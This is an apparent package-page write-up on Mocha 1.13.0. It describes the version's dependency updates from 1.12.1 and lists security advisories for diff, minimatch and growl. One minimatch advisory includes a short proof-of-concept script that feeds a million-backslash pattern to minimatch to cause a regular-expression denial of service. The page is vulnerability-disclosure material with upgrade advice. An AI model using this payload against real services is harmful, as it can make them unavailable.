Mocha is a flexible and fun JavaScript test framework primarily used for Node.js and in the browser. Comparing versions 1.13.0 and 1.12.1, several dependency updates offer valuable insights for developers. The most notable change lies in the updated dependencies. Specifically, the "diff" package jumps from version 1.0.2 to 1.0.7, potentially incorporating bug fixes and enhanced comparison capabilities within test results. Similarly, the "glob" dependency moves from 3.2.1 to 3.2.3, possibly affecting file path matching during test discovery and execution, resolving edge cases or improving pattern resolution. While other dependencies like 'jade', 'debug', 'growl', 'mkdirp', and 'commander' remain unchanged, these two updates are important for projects sensitive to accurate diff reports and reliable file matching within the testing environment. Developers upgrading should review release notes or code changes related to 'diff' and 'glob' to understand the exact impact on their test suites. Version 1.13.0 was released on September 15, 2013, providing newer features compared to version 1.12.1 released on August 30, 2013. Developers should consider these updates, especially when encountering issues with file system interaction or test result comparisons that could be connected to the updated dependencies.
All the vulnerabilities related to the version 1.13.0 of the package
Regular Expression Denial of Service (ReDoS)
A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Growl before 1.10.0 vulnerable to Command Injection
Affected versions of growl do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.
Update to version 1.10.0 or later.